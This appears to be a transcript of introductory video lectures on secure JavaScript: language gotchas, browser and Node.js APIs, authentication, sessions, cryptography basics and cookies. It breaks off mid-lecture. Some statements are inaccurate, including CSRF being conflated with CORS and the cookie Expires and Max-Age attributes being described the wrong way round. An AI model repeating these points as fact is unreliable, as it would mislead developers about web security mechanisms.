Hello and welcome to Secure JavaScript Programming. I am Vladimir de Turkem and I've been working in application security for over 5 years in a security startup named Screen. I've also been speaking at multiple conferences around the world, whether in the JavaScript world or in the application security world. I am an official Node.js contributor and I've been having commit rights on Node.js for multiple rights. I'm mostly specializing on web security, Node.js security, and JavaScript security. So, JavaScript is one of the most widely used languages in the world. Virtually, it's everywhere, and I don't think you can have any programming career without using JavaScript at one point. It's used, of course, in web browsers, in websites, but also on the server side with Node.js, and even databases support JavaScript. The most well-known database that uses JavaScript out of the box is MongoDB. JavaScript is even used in space exploration mission by the NASA or SpaceX. It's a language that is everywhere, and when having a technology that is so widely used, the question of security is legitimate. In this learning path, we will study JavaScript security and understand the threat surface of JavaScript applications. In this path, we will cover web browser security, we will talk about authentication, cross-site scripting, XSS, cross-site resource forgery, CSRF, browser protections, course, clickjacking, what are these, how do you prevent attacks. We will also talk about things that are related to the language itself, for instance, prototype pollutions or malicious regular expressions that are inherent problems to the JavaScript language that can be used in a weird way and can lead to security issues. Also, Node.js and JavaScript have the most wide ecosystem in programming in the world. This goes through the NPM ecosystem, and we will study the security of the NPM model, what to do if one of the modules you use is marked as vulnerable, and how one would attack applications from the supply chain. Also, in this learning path, I have integrated a course about serverless functions. Serverless is mostly used in cloud programming and is more and more used in web applications. We want to know what are the security postures of web applications that are developed with serverless technologies, whether they are AWS Lambdas, Google Functions, Google Firebase, or alternatives. So if you're interested in modern cloud applications, you might want to take this course in particular. Join me for more JavaScript fun. I'm really excited to have you join this course, and I am really excited to teach all I know about JavaScript security. Have a great day and see you soon. Hello and welcome to Secure JavaScript Programming with Vladimir de Turkem. In this video, we will do a few refreshers on JavaScript itself. So, JavaScript is a programming language that appeared in the late 90s and has become one of the most preeminent programming languages in the world. In this video, we will go through the basics of JavaScript. You probably know them, but it's never bad to have a few refreshers. So, here I've got an IDE that is used to write JavaScript code. Let's do a traditional hello world function, a call. I just need to write hello world into a console.log statement. So here we've got an object named console. On it we've got a function, a method named log, and here we can pass a string. I usually close all my statements by semicolons. Most of the time it doesn't matter, and that's a personal preference. I will just run this piece of code, and at the bottom of my screen you can see that we have logged hello world. Hooray! When learning JavaScript, one of the first topic, one of the first notions that is easily overlooked is the strict mode. The strict mode is actually a newer feature of JavaScript that has been defined to reduce the weird corner cases of the languages. So let's create an object. Here I've got a new object in the variable x. And on this object, I will define a property that I will name y, foo is a better name, and I will say that its value is 10 and that it's not writable. So one could expect that console.log x.foo displays 10. Let's try that, it works. However, if I do x.foo equals 11, and then I cancel log x.foo once again, it will display 10 twice. That's really weird. So let's understand what happened. The property foo on the x object is not writable. It's not allowed to write on it. So I wrote on it and I did not get an exception, but the writing was ignored. In theory, in a well-defined language, we should have an exception. And that's one of the reasons why the strict mode was created. So let's just add use strict as a string at the first line of our script or function and run that script again. At this point, we've got a type error that is thrown at the line 10, telling us, yes, cannot assign to read-only properly foo on object. That is one of the points of the strict mode. It enforces better predictability of the code. As you can see, you can put strict mode at the top of a script, or you can put it at the top of a function. And in that case, the whole script will not be in strict mode. So let's try that. Let's keep our x and create a function. Let's name it capital F. And in this code, we will redefine everything but call the variable y because it would be ugly otherwise. We rename everything y. We call f below its definition, but here we put use strict. And because that's a lot of logs, we will put some hints to know what we are logging. Now, same thing with y and y. And let's rerun everything. At this point, x has been called twice because this piece of code is not in strict mode. So it's allowed, it doesn't throw an exception to overwrite a non-writable part of the code. However, in the function, since the function has been defined in strict mode, we cannot have this shoot in the foot features. There are a lot of other features that are different in strict mode, and we will see that a bit later in the next part about variables. But as a rule, always run everything in strict mode. That is for historical JavaScript. If you're running JavaScript with ES6 modules, which is the module feature of JavaScript. So when you've got imports line in your code or exports keywords, you are in a module. For instance, in Node.js, it often happens to have the extension MJS, or there will be a type module definition in the package.json. In that case, ES6 modules are all by default in strict mode, and you cannot escape it. However, out of habit, I usually always put a use strict at the beginning of my scripts. Now, let's talk a bit about variables. Here, I've got a piece of code, let's remove the use strict for the demo, that declares a variable and logs it. But it's a bit weird. So there are actually 3 keywords to declare variables in JavaScript. The historical one is var. And var is somehow a bit weird. It's poorly scoped, and when you write var something, it actually compiles to code with the var statement coming at the top of the code. So if I run this code, it will work. Let's look at the code. In line 1, we say x equals 10, then we console.log it, then we define it. And it actually doesn't give us any error. Thing is, this code is actually equivalent to this. But because var has this weird behavior, all variables declared with var are actually implicitly declared at the top of the scope. If we use strict this time, it will still work. Even in strict mode, you can use a function, then declare it. However, in strict mode, if I remove the var, it will crash as the variable is not defined. If I remove your strict, it will work. So the strict mode forces us to declare the variable, but var does not force us to declare the variable before using it. So once again, you should always run in strict mode and avoid var altogether. It has some unpredictable or at least hard to understand caveats, and one should avoid it altogether. If you can't define variables with var, how can you do it? Well, there are 2 very handy keywords for that. The first one is named let. So let's do this. This crashes because it tells us cannot access X before initialization. Of course, I'm not using var, so I need to declare the functions before I can use them. Also, outside in strict mode, once again, you cannot use a variable that you haven't declared. So we are in strict mode, we need to declare all the variables with let or const, and we need to declare them before using them with let or const. Because in this course and in your code, you should always avoid using var or using code outside of strict mode. Let is actually the definition you use when you want to be able to redefine the reference on the variable. So for instance, if I say x++, it will increment x, and I will be able to log 2 values of it to change its value. However, also, as you can see, I can also declare my variables and initialize it at the same time. This gives exactly the same result. If I use const here, I won't be able to reassign the content of the variable. Assignment to constant variable. So, to be fair, x++ is the equivalent of x equals x plus 1. And as you can see, my IDE complains. So with let, I can redefine the variable. With const, I wrote some very weird code. Let me rewrite that. With x, I can redefine the variable. With const, it will fail. However, const doesn't mean that the object is unmutable like in other languages. So let's say I do x equal object and x.foo equals 1. If I console.log x, it will work. In some languages, when you use the const keyword, it means that it becomes unmutable. That's not the case in JavaScript. In JavaScript, only the reference the link from the name of the variable to a value in memory is static with const. However, the value in memory can still be mutated if it's an object, for instance. That's it for the variable part. Now let's talk about something else that is very important, functions. There are multiple ways to define functions in JavaScript. We can start defining a function with the function keyword and a name. In that case, the function will have the same behavior as the var keyword, meaning that its definition will happen at the top of the code. We can also define what we call an anonymous function. It means that you define a function without giving it a name. However, for this to be valid, you need to put it in a variable. So in that case, the main difference is here I've got a function object in memory named f, and here I've got a reference, I've got a variable pointing to a function that has no name. You can always do what you want in a function, and they have a scope. So if you use const and let within a function, its variables are scoped there. And to return a value out of a function, you use the return keyword. There is another way to define function. It's arrow function. Arrow equals a, and arrow functions can have, for instance, a short way of returning. You can also, this is the equivalent of return. This is the same two functions, arrow1, arrow and arrow2 do the same thing. They return that time once. That's not really interesting. However, there is a last way of defining function, and this one is actually problematic in terms of security most of the time. A new function equals new function, and here you need to declare the variables y, a, b, and here the code of the function, just b. And at this point, return. At this point, if I call console.log a new function.toString, we will see the source code of the function defined with the function constructor. You see, it's a function that takes two arguments and returns a plus b. It's pretty dangerous to use this syntax because you can create vulnerabilities to string injections, and you don't want that. You always declare your function properly with the right keywords. Okay, JavaScript objects are typed, and there are a few basic types in JavaScript, even if variables are not types. You can check the type of something using the type of keyword. So let's do a few things. Let's put a few items. So here we've got the type of different values. The type of an object is object. The type of a number is a number. The type of a string is a string. The type of a number is another number. The type of a null is object. That's a usual caveat. When you try something for being an object, you also need to try if it's null. And the type of undefined is undefined. The undefined value in JavaScript is the value of something, of a variable that has not been initialized, of a function that the return value of a function that doesn't have a return value, or a function that, a variable that just doesn't exist, or a property on an object that does not exist. The last important part of JavaScript we will see in this video is the equality and the falsy values. In JavaScript, you've got two ways of testing equalities. You've got double equals and you've got triple equals. If I run one double equals string 1, it returns true, but triple equal string 1s return false. That's because double equals does not enforce type checking, meaning that two variables that have somehow the same content, two values with somehow the same content, might be equal with double equals. That's why we always must use triple equal in JavaScript to enforce type checking in variable comparison. Also, JavaScript has a set of values that are falsy. So to test if something is truthy or falsy, you use double bank, and then you can test a value for being falsy. The list of value being falsy in JavaScript is pretty interesting. Here is the full one. Let's run it to check, and everything logs false. False obviously is falsy. 0 is falsy, like in C. The empty string is falsy. The null value is falsy. The undefined value is falsy. And the not a number value, which is a number returned when you try a numeric operation on something that is not a number, is also falsy. All of that can be found in falsy checkings and can also shoot you in the foot. Those are my personal list of gotcha of JavaScript that I wanted to review with you before going further in this secure JavaScript programming course. I hope you enjoyed this first video, and I hope to see you soon in another video. Until then, have a great day. Hello and welcome to Secure JavaScript Programming with Vladimir de Turkhem. In this video, we will do some refreshers about the web browser. So let me just remove Slack and we can start. Here we've got a pretty simple, straightforward web page. Actually, I know it's not very usual nowadays, but if we check the source code of the page, we actually have the real content of the page. And with modern frameworks such as Angular or React, this doesn't happen much anymore. So this is a very standard HTML page with two paragraphs, one which has the ID1, and one which has a class 1, and the first one contains P1 and the second one contains P2. The web browser is one of the two main JavaScript runtime environments, the other being Node.js that we will see in another video. It's the historical one, and pretty much all desktop computers in the world use web browsers. It is extremely important to understand what a web browser is. Basically, it is made of two components: an engine that renders the HTML page. This is the one that actually displays what is in the HTML code, and a JavaScript engine. The JavaScript engine executes the JavaScript code. So for instance, in the case of Chrome, the JavaScript engine is named V8, and that's an open source Google project. You can get standalone V8, and it's also used by Node.js. There are other JavaScript engine, for instance, the one that is built by the Mozilla Foundation is named SpiderMonkey and is used by the very popular MongoDB database. The JavaScript engine has what it's called bindings, meaning that some objects and functions are provided by the environment to expand what you can do with JavaScript. So instead of just being able to write code, so for instance, we will do a console.log hello world. This is just plain JavaScript code as we could run in any other JavaScript environment. You can also interact with the document object model, with the web page. So let's say I want to access to the paragraph which contains P1. Then we can call the document object that is provided by the browser to the JavaScript engine, and we will say get element by ID, meaning we will get one single element by its ID, because in the HTML specification there should be only one element in a page with the same ID. So here we just put ID 1, that's a string, and it returns us with the document. So it's a pretty view that we have to see it, but under the hood, if we get out of the console, we can actually let me just clear the console. We can just get it and put it in a variable. So const p1 equals. And here we've got a value in p1, which is the paragraph, but we can also access its constructor. And here it's in JavaScript. And we see it implements a class named HTML paragraph element. This class actually implements another class which is named HTML element. The HTML element class defines all the methods that are accessible on the elements that exist in HTML. Because there are bindings between the JavaScript and the HTML world, it is possible to actually change what's in the HTML page from JavaScript. So let's take our P1 and change inner text to hello world. And if you look at the left-hand side of the screen, when I press enter, value of P1, the text within the variable, has changed. If we check the source, it hasn't changed in the source itself, but it has changed in the representation in the living document. So if I reload the page, I go back to the previous item. Now let's get documents, get elements by class name, and let's do class 1. Here we've got an HTML collection. It's not an array, but it's an iterable object. This means that you can call a for loop on it, but you can also call array. Sorry, let me start that again. So here I've got this one, array from, and from all iterable you can call array from, and it will return you an array, and each element inside is actually an HTML element. So we can do the same things, but they are not arrays when you get them from the DOM. You need to convert them. Also, there are other APIs that are available. There are APIs to access the webcam of the user, and that will print a need for the user to explicitly accept the website to use the webcam, but you can also access the GPU or the USB ports. The web browser is now more like an operating system than just a web browser. You can access the hardware. You can also create workers. Workers will be other threads that will run in parallel from your web page. Also, it's worth noticing that two tabs in a web browser are technically isolated. You cannot communicate with another tab directly. If they are from the same domain, they can share the same worker, and you can communicate through tabs through a third-party thread. Browsers also have ways to do HTTP calls over JavaScript call. So for instance, there is the fetch method. Let's try to call example.com. It returns a promise and it tells us that something went wrong. So two things happened. First of all, we created a pending promise, and at one point it got rejected. Why did it get rejected? Because of the CSRF, usually named course, which are a feature that prevents websites from accessing from multiple origins. We will see later in this course about attacks through web browsers. For instance, since this website is running on my own machine, if I allow it to access any resource, I could use it if compromised to load assets from somewhere else and get an XSS. But we will see that later in another video. Since web browsers have network access, they have the same network capability as the host machine. So they can usually access the internet to load web pages. But if you've got a local network, which is either a home network or enterprise network, a web browser can access any documents, file system, websites on these other networks. So often we can see attacks of malicious websites that are trying to access enterprise or home networks through web browsers. Web browser, when they run a website, they provide with development tools. So you can, for instance, take a snapshot of the JavaScript memory of the code of a web page. So here we have access to the whole memory of the web page, nothing on the server, everything in the browser. You can also get CPU profile to debug your website or reverse how it works. You even have a security tab to check what are the security issues. For instance, this web page has been loaded through HTTP instead of HTTPS, meaning that the assets might have been tampered by a man-in-the-middle attack or are just not authenticated. Since we are on localhost and it's working properly on my machine, we are good to go, but a non-HTTPS website may be dangerous. In the Application tab, you can see that the web browser provides what are called storages. There are multiple kinds of storage. There are local storage that are proper to the websites. You've got session storages that are cleaned each access to the website. The local storage is not. It's a cache that exists until it's cleaned. You've got two databases. One of them is actually outdated. You can learn on them directly on Google's website. And you've got the cookies. The cookies are set by the server and are either accessible in JavaScript or not, depending on how they work. You can push data from a server to the browser with certain API, and you've got a lot of other new API in modern web browsers. If your application has a manifest, it can be held as a web application that will be the equivalent of a mobile application, but within the browser. I was talking earlier about workers. You've got web workers, but also service workers that can be used to perform tasks on your browser, even when the website is not running in the foreground. Also, you can see that I have extensions such as AdBlock. Extensions are usually written in JavaScript and have access to certain authorization. For instance, the AdBlock extension on my browser is allowed to check to prevent the web pages from loading assets from certain origins. That can be extremely intrusive. So one should know exactly what are the authorization of each extensions. They run JavaScript. That's not only websites that run JavaScript, but also extensions. I've got an extension that I like a lot that is named Wopalizer. So let's go to google.com. And here, if I click on this, it tells me that it's running on Google Web Servers, use a JavaScript library named Hammer.js, and has card functionalities. That's an extension that I have allowed to audit my web traffic to see what are the technologies used by the websites I connect to. And here you can see that it has detected items through AdBlock and allow me to block them. And that's just JavaScript code. We've got some errors that are the one from our earlier fetch. So what did we learn? We learned that the browser is actually probably one of the most dangerous pieces of code to run on your laptop or your desktop machine, because you run arbitrary code that comes from the internet without deciding to run it, because nobody disables JavaScript execution anymore, that can ask to access your hardware directly, that can perform network access on local network or remote network, and the browsers can actually load multi-threads and run extension that can spy on your traffic on the internet. In this course, we will go in depth against the attacks regarding browser JavaScript and server-side JavaScript, but it's important to understand these core concepts about the web browsers. That's it for this video about refreshers on the web browsers. I hope you enjoyed it, and it refreshed a few concepts that are much needed, namely bindings, code execution, and page rendering. Thanks a lot for watching this video. Have a great time until we meet again. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkem. In this video, we will do refreshers about Node.js. So the first question one may ask is, what is Node.js? Well, Node.js is a JavaScript runtime built on Chrome V8's JavaScript engine. It doesn't have any HTML rendering capabilities. It is just a command line program that runs on your desktop. You can download it from Node.js.org for your own version of for your own operating system, but I usually recommend using an installer such as NVM for Linux and macOS. You have a documentation that is available online, but we will check that a bit later. So, Node.js, how does it work? Well, it's a JavaScript runtime, so you just have .js files, like hello world from Node.js, and you can run them directly. The main difference with raw JavaScript and a web browser is that Node.js provides certain APIs. Those APIs gives you access to certain features such as access to the file system or cryptographic libraries or network access. So how can you import, for instance, the file system API to log the current code base? Well, you get the file system API through a method named require that is used to import libraries or modules in JavaScript, in Node.js. So if we want to get the content of a file, we will call fs.readFile, and then we will put the path to this file. So since we are in Node.js, I can use __ file name, which is the path to the current file. Now something weird is happening. let's call it data. I pass a function as a second argument. Node.js is an asynchronous first runtime, meaning that most of the libraries, most of what you do with Node.js is asynchronous. There are multiple ways of handling asynchronous flows in JavaScript. One of them is, for instance, the promises, but the one we will use right now is the callback function, meaning that we pass a function as an argument to the method, and when the value we want is available, in that case the content of the current file as a text, it will be available as a function argument. By convention in Node.js, the first argument of a callback function is usually the error. So let's say if error console.error error, and then else console.log data, and data is in the format of a buffer, which is a native JavaScript Node.js object that you want to take a look at in depth if you're interested in. So we have to call toString to get a string. So let's run this code. We get actually the content of the file because there was no error. But now let's try to access a file that does not exist. Then we rerun this code and we get an error that is logged at this line of code, no such file or directory. That's one of the main differences between Node.js and the browser. Node.js being a server-side runtime, it has access to the file system. It has access to a lot of other APIs. So I was talking about buffers. Buffers are global objects that are used to represent a sequence of bytes that can be converted to strings. But you can also check the documentation of the file system API that is here, fs. That's the one I used, the whole documentation on how to read, write, open, delete, create files or directory is available here. It's available in a synchronous and an asynchronous manner. It's really important to understand that Node.js has a single thread, which means that if I read two files in a row, so let's say I want to do console log file 1 done, and then I will read something else like a directory, read dir, so I need to put dir name, dir1 done. Those are executed in the same thread. And as you can see, even if the call to read dir app is sent after the call to read file, its callback function is called first. That's because all of that happens with a single thread and an event loop. There are much more detailed videos about how Node.js works, even on InfoSec skills, but this concept is extremely important because Node.js can only do one single thing at a time. So let's see if I put a loop here. So I will say for let y equals 0, y 1 6, which is 1 with 6 0 behind, plus I, do nothing. And if I run this code, it actually takes a bit of time before fulfilling the others. Let's try with another value. Okay, let's do this. It will actually run all these calls before accessing the files. So now 7 is a bit high. What's important to understand is that Node.js can only run one thing at the time. So this synchronous block of code prevents these asynchronous blocks of code from running, those callback functions from being called. Meaning that when you have a server running Node.js, well, if you've got a piece of code that is synchronous, it will prevent the execution of the rest of the code. And Node.js has been designed for high throughput web servers with a lot of asynchronous calls. That leads us to the first rule of Node.js: never block the event loop. So what are the other APIs accessible on Node.js? Well, we've got a very fancy one, that is the HTTP API. The HTTP API enables to do two different kind of things. It enables to create servers. When you create a server, you pass a callback function that will be called each time there is an HTTP request, and it takes two arguments: request and response. And if we want to just send OK, we do it that way. And now each time there is an incoming HTTP request, we will respond with OK. Then, since it is a web server, we need to listen on a port. So let's listen on 8080. Now we've got a running web server. Let's just put a process.next tick, which is a simple asynchronous operation to make sure that our server has started. And now we will do something else with the HTTP core library. We will do a get call. That means that we are also able to do HTTP request through this library. So we will do HTTP localhost 8080, and now we will pass a callback function with a response. We will just log a response on data because response is a stream. So it comes asynchronously with this callback being called multiple times. Once again, it might be a buffer. So let's run this. Okay, that's probably because I wrote localhost instead of localhost. Now it should work. Okay, what happened here is that we started a server that responds with OK, a new line for each request, and we sent an HTTP request directly from the same thread to the server. So it called the port 8080, got the response, and asynchronously displayed it. What are the other libraries on Node.js core? Well, one of my favorites is named Crypto, and it has nothing to do with Bitcoins. Crypto basically contains what you need to do for cryptography. So the SSL handling in Node.js is handled through it, but also since Node 15, it has a random int method. So for instance, if I want a safe random number, this one will be cryptographically strong, unlike using math.random in JavaScript. I can call the crypto library, and this is something linked with Node.js. This won't be available in the browser. So in the browser, if you want random number, you might still have to use math.random, but those random numbers won't be safe in a cryptographically way. Sorry for this word. What are the other APIs that are also available for Node.js? Well, the OS API gives you knowledge of the current operating system. If it's, for instance, Windows or macOS or Linux, its release version, or even the CPU architecture, the network interfaces. Everything in Node.js is available for you to build web servers as you would do in Java. For instance, if you don't want to do HTTP, you've got the net core module that gives you a TCP library with everything you need to build TCP server and clients. You also have access to the V8 module that exposes some capabilities of the V8 runtime. V8 is the piece of code, the open source piece of code designed by Google that runs JavaScript in Node.js and Google Chrome. So for instance, you can use it to get a heap snapshot, which is the state of the memory at one point, or to just know how much memory has been used. Node.js provides features for WebAssembly, including the WebAssembly system interface that enables you to run WebAssembly and gives system access to your WebAssembly bundle in a sandbox. So I told you that Node.js was single-threaded. That's somehow true and not true. Like in browsers, there is a worker API that can be used to create new threads and communicate with them. You can parallelize synchronous tasks, such as creating an object from a serialized object in JSON or XML, and gain performance boost from there. Also, since some system syscalls you might want to do might not be available directly in Node.js, you might want to create your own add-ons, so you can embed C, C++, Rust, or any machine code in Node.js. There are some APIs for that. For instance, if we check the very popular SQLite 3 npm module for Node.js, this is bindings from C code to JavaScript. So let's check its source code of this module. It is for 15% written in C++, and there are codes that are called bindings that are actually used to expose functions to Node.js. So for instance, when you use create function, create async work, it creates a core asynchronous task in C++. And you have JavaScript code that is exposed in JavaScript that you can use. For instance, if we check its documentation, we can call new database and call things on this database like SQL queries, but that directly through JavaScript functions that actually call C code under the hood. And it's not unlike the core libraries of Node.js that actually call syscalls. When you call fs.open on something, on a file, it actually calls the core Unix open task. So let's check it. If I do man open, I've got the definition of the open syscall in Unix. Well, that's exactly what happens in Node.js when you are running on macOS or Linux. The main difference is that Node.js has the same system API for all supported operating systems, including Solaris and Windows. Well, this is it for the Node.js refreshers. I hope you enjoyed them. This will be critically needed for the rest of this course. So thanks a lot for watching them, and I hope you enjoyed this video. See you soon in another course. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkem. I am Vladimir.Turkem. I am the lead engineer at a startup named Screen, where we do web security. And I'm also a member of the core Node.js team. I've been having Node.js core commit rights for a few years now. You can follow me on Twitter. That's actually my preferred way of being contacted over the internet. So if you want to reach out directly, feel free to do that through my Twitter account. It's Paul Defets. So in this course, we will talk about authentications and the flows and the vocabulary linked to authentication. And we will mostly focus on web applications, of course. So First, what is authentication? Authentication is the act of knowing who is the current client. And there can be multiple kind of clients in an authentication flow. It can be a human being, a real user. So you want to identify who is the human being on the other side of the network. There can be a device. You want to identify that this is a phone or a computer that is doing the operations. Is my client a device? Or maybe a piece of software. You want to identify a piece of software such as a web browser, or if you have a licensing server, you would identify the piece of software on the other side of the network. And that's pretty much the idea of authentication. You want to identify who is the client, but depending on the context, they can be different kind of entities. When you want to identify a client, you usually do what's called a login operation, a login action. And that's the act of identifying a client based on shared secrets. So, multiple secrets or traits. So, you have multiple ways of doing that, and usually once you have done the login, you create what's called a session, and we'll see that later. So you have multiple ways of identifying someone with secrets. Either you have shared secrets, and that's actually not really strong, because if to identify someone I just need to know a password we both know, there are too many people who would know these passwords. So that's probably good for spy movies, but that's not reliable on the internet and on networks. You can use a couple username/password. In that case, you need to hash the password, so you don't know the password on the server side, and only the client knows the password. We'll see that later. You can use OTPs for one-time passwords. That's the kind of password you get by text message or on an authenticator application on your mobile phone. In that case, I would recommend you use a third-party provider, because the specification to build OTP systems is actually pretty complex. There is a RFC for that, and it's really complex, and it's really easy to make a mistake and reduce the security level of the whole system. So I would advise against rolling your own. Last but not least, there are third-party logins. That's, for instance, the social logins, where you log in through Google or log in through Facebook. Well, you rely on a third party to handle the authentication of the user. You can also have commercial entities whose business is to do authentication and user management for you. One of them, for instance, is Auth0. Well, login usually happens occasionally. You don't log in to your Gmail email address every day. You have your browser that is authenticated against it. And usually the user is aware of it, because there is a user action. If there is a password to write, the user has to write the password. If there is a one-time password, they have to fetch it, get it on their phone. If that's a third-party login, well, they have to click on login with the third party. So the end user, the human being, is usually aware of these operations. Once you have identified who's on the other side, you can create a session. And session, it's to identify a client that is already logged in. There are multiple ways to keep a session, and basically the idea is that for each HTTP request, you're able to know who is the client on the other side without asking for the end user to write a password for any HTTP request. So there are multiple technologies, and as for login, you can use more than one at the same time. So, for instance, one of the most popular one is cookies. Please only have them over HTTP and don't make them accessible to the JavaScript code. You've got the JSON web tokens. or JWT. Don't say JWT token because it stands for JSON Web Token token, and it doesn't really mean anything, and that's a mistake a lot of people do. So for instance, JSON Web Token are a way to put data in a signed way, so you know who issued the token because it's signed, and with the public key you can check that it has been signed by the authority you expect it to sign it. But it can make sense to use a JWT as a cookie. There is nothing preventing that. That's actually pretty common. Or you can just generate a random string, sign it to make sure that it has been issued by a trusted authority, and put that in a cookie. But that will totally work. And that's the most usual way of authenticating a user on the internet. The end user doesn't know about that because it's under the hood. Because at each HTTP request, the cookie that is in the browser is sent back to the server, and the server maps in database with the cookie and the user account. So a few best practices here. Only do this over HTTPS. Don't do that over HTTP, because if there is no encryption on the wire, anyone can steal a session. Also, you need to expire sessions. At one point, a session cannot be valid forever. And you need to invalidate sessions. So if someone logs out of the service, you need to make sure that the cookie, the token, is not valid anymore and will refuse to authenticate on each request. That's a very common mistake on the web, to forget to invalidate sessions. Okay, speaking of logout. Logout is the act of closing a session. So you need to invalidate it. It must be done. Once again, it's a very common mistake. Everyone forgets about logout for some reason. Sometimes it makes sense to have a logout on the app, even on a mobile app, and that's a product choice. It has to fit in the user experience for your application. Usually, you want the user to be aware of that, so they actively logged out. So for instance, if you're checking your bank record online, you want to make sure that you log out before anyone else can use the same browser. Or even you want to log out to invalidate the session, so if anyone is able, to find your cookies in log, they cannot replay it. That's why it's extremely important to log out from your bank record online. However, it's possible that the session is just invalidated, expired, and if it's just expired, well, you're silently logged out, and you will discover that when you have to log in again. Authorization. Authorization happens when a client tries to access a resource. And when you try to access a resource, you need to make sure that the client has the right to access this resource. So there can be multiple levels of authorization. For instance, if you've got a system that is full read-only, but only for authenticated user, you just need to check if the user is authenticated, and that's enough. But if that's a personal record, let's say that's where a school keeps the grade of the student, you don't want student A to have access to the grade of student B. So does the resource contains data that must not be sent to this client? That's the third bullet point here. Also, there is the question of role. If you're an admin on a system, maybe you have access to all the data inside this system. So there is a question of authentication, of ownership of the resource, and rights as role-based access, where admin has access to everything, moderator can moderate data, and people can just access the data that makes sense for them for regular users. So content-based access is really important because in a GDPR and CPA-based world, the content of a resource might be extremely sensitive. Well, for instance, if you have a social security number or a bank account balance in your system, you need to make sure that the user accessing to that has the right to access it. Maybe some employees of the bank must not access social security number of some clients. So when fetching the resource, one must know if the PIIs, the personal identifiable information of an individual, can be accessed by this client. That's the needs from the GDPR. An example, a person delivering parcels should not have direct access to the phone number of the customers. This must go through a central service guaranteeing anonymity of the phone number to both parties, because it's a two-way street. If someone delivers a parcel to you, you should not have access to the personal phone number of the delivery person. And if you check the history of car sharing applications, there have been a lot of cases where the driver having personal identifiable information about passengers could lead to issues, and that's why you need to guarantee a level of anonymity between those two parties. So check your PIIs. That's one of the most important parts. Let's go for the last part of this course, which is cryptography for the busy dev. This is in no way a course about cryptography, much more refreshers on what basics of cryptographic concepts must be known by anyone building web applications. So, hashing functions. I like to say it's how to check a secret without knowing it. Password hashing functions are used to check passwords without saving them at plaintext. Basically, you give a string as input to this function, whatever it lengths, and it will return a fixed length string, and guarantee it's really hard to find two outputs with the same output. So you pass a parameter, you get a response, an output, and it's extremely hard from the output to find the input and to find an input that gives you the same output. How do you choose the right hashing function? Well, I would recommend checking what the National Institute for Standard of Technology, the NIST, recommends, because this evolves with time as knowledge and attacks evolve against these functions. So to be up to date, check what the NIST recommends. Also, be sure to use a salt to avoid kind of attacks that can be time attacks or rainbow table attacks. And feel free to Google in depth what it is, but this is not a course about attacking cryptography, so I won't go in depth with that. Usually, bcrypt is a safe bet. Symmetric cryptography. There's a single private key and both parties know it. So that's when you have a shared secret. There's only one secret, and it can be used to cipher and decipher the message. So you have a message, you use the key, you can cipher it, and you use the same key, you can decipher it. This is usually very, very good in terms of performance, and the standard algorithm right now for that is AES. It's a very good algorithm for that. It uses a private key. But it's a block algorithm, so it can lead to certain attacks against it. Wikipedia is really good at explaining what they are. So when you use that, use an operation mode to turn it into a stream algorithm where the block attack can't happen. Asymmetric cryptography, on the other hand, is really interesting too. You've got a private key that's a secret known by a single entity, and there's a public key that everyone in the world can know. And if you cipher the message with the public key, only the person that have access to the private key will be able to decipher it. Also, you can use the private key to sign a message. And in that case, everyone with the public key will be able to ensure that the message was signed using that private key. So that's a signature because you can identify the author of this signature. One of the most popular asymmetric cryptography is RSA. You also have PGP. Overall, and that's probably one of the most important slides in this whole presentation, never rule your own cryptography. So there are countless of cryptographic algorithms. Some of them are really complex to implement. Most of them are really complex to implement. And don't take the spec and implement your own cryptography. Always let someone do that for you because this is actually really hard to do and really easy to fail. Thanks so much for watching this presentation. I hope to see you soon in another presentation about JavaScript secure programming. Until then, have a great day and take care. Hello and welcome to Secure JavaScript Programming with Vladimir Turkem. As you know, the topic of the video today is about cookies. Okay, first of all, I want to apologize for this terrible joke. I had a cookie on my desk and I wanted to show it. Okay, so let's talk about cookies today. Cookies are a very important part of the web. It's the main way of authenticating a user, whether by knowing their identity, so you can do authorization or authentication based on cookies. You can detect the role of a user based on the cookies, but also this is vastly used for user tracking and monitoring who the people are out of marketing reasons. So it's at the same time a very important tool in terms of authentication management and security, but also a very important tool in terms of people tracking and privacy. They are everywhere. And it's actually very fair to say that even people would have never written any single line of code in their life know about cookies, because they're like the boring banners that can come when they live in the EU, but I don't want to spoil the end of the video right now. So cookies, let's go with the simple definition. Right now I've got two Express.js servers, and well, a cookie is just something in a header. So you've got first of all a request header, or a first request header that is about, let me start again. You have an HTTP request, and if in your response there is a header named setCookie with a value on the right hand side, then the browser will store that. And each time it will make a new request to that web server, it will actually put that in a header named cookie. So let's start with this first example. I'm running a first server on the port 3000, and when you have a request coming in, it will actually say set the cookie server name server1. So let's go there. And now we see, so actually this is a web page whose code is to show the cookies, but we'll say that a bit later. So if I go into my debug console and I show the cookies, I see that there is a cookie named server name, which is exactly what we set into the backend code. That it has the value server1. Once again, that's what we set into the code. It's on the domain 127.0.0.1 because that's the URL I've been using. It has a path, it has an expiration, it has a size, and now you've got some diverse fields that we will see later. Okay, so now let's do a request, an HTTP request. We don't really care about its content. We want just to do a request on the same server on the print endpoint. And here the print endpoint, what it does, it accepts incoming requests, but console.log the headers of the request. So what we have in the console here is the headers of the request. Okay, we can see that we have a header that has a named cookie, and that has a value server name equals server1. And we don't have more JavaScript code in the web page than that. We did not write anything complex in the console when we did our fetch call. This is just the default behavior of the web browser to spread cookies it has in memory. So now let's check how to access cookies from JavaScript. Well, that's pretty easy. You can do document.cookie and you will get a string with the value of the cookies. So let's say that my web server has another cookie. Let's restart it, reload the page, and now if I do document.cookie, I see that I have two values here, which is pretty cool. But because they are used for authentication, there are a few things that need to be taken in account. The first one will be the expiration. If you remember the videos about authentication and management, the previous one, we don't want sessions to run forever, or at least we want to have a way to limit the time of a session. So to do that, there are actually primitives that you can use that are expire or max age. So let's say that I want the over me to have a max age. Is that the correct case? Yes, I don't think it matters a lot. Equals, and let's say we want to do that until 20th October 2021. Let me just check something quickly. New date. Up. Let's do something like that. It will be easier, at least if I'm not mistaken. So let's restart this server and reload. And now you can see that on the other cookie, it has an expiration date. It's actually very important when you set either an expiration duration with expire or an expiration date with max age, that you know that these dates, this expiration, is not based on the server side time, but on the client side time. So if your clients have clocks that are shifted, this will actually have an impact. Okay, now let's talk about the scope of a cookie. A cookie is by default available on the exact same domain and on all paths. But you can, let me start the second server. Oh, sorry, wrong one. Up, we started a second server, and if we check the cookies, we see that this one is on localhost, so its domain is localhost. You can decide when you set a cookie if it is scoped to the whole world, if it's scoped to subdomains only, or only to the same domain. And the browser will actually know and decide when to send the cookie properly. Also, you have exactly the same thing with the path. Okay, so I told you about the scope of cookies. I told you about 